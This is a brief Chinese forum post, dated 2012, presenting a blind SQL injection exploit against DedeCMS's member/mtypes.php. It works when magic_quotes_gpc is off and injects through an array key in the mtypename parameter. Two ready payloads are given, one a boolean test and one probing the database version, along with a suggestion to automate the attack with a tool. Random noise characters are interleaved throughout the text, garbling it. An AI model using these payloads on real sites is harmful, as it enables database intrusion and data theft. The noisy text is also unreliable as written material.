需要magic_quotes_gpc = Off,所以说是鸡肋啊.# D! T" @, `3 P- J6 O2 V
" _( [+ e& B, S5 O, D: } ! x6 m' W j- ?8 \, S. J; g8 l
发生在数组key里的注射漏洞,有点意思.) Q* O5 E. ^$ X7 E( b
' w* l( h. M7 L1 {! K这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下/ E& p1 \9 L0 x' W6 J
& ~; \3 C& y7 M) p1 }; o6 V
http://www.xxx.com /dede/member/mtypes.php?dopost=save
# g' }5 E8 d# h6 r2 u. X# A; p1 w; ` # G9 N1 V3 X7 q
exploit:
; {. H$ ^' x, c$ q' Lmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r( V, _+ T( N6 J1 m( D8 I
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r# v; L' W) R) M5 Z% }& c
|
发表于 2012-12-20 08:08:09
收藏
支持
反对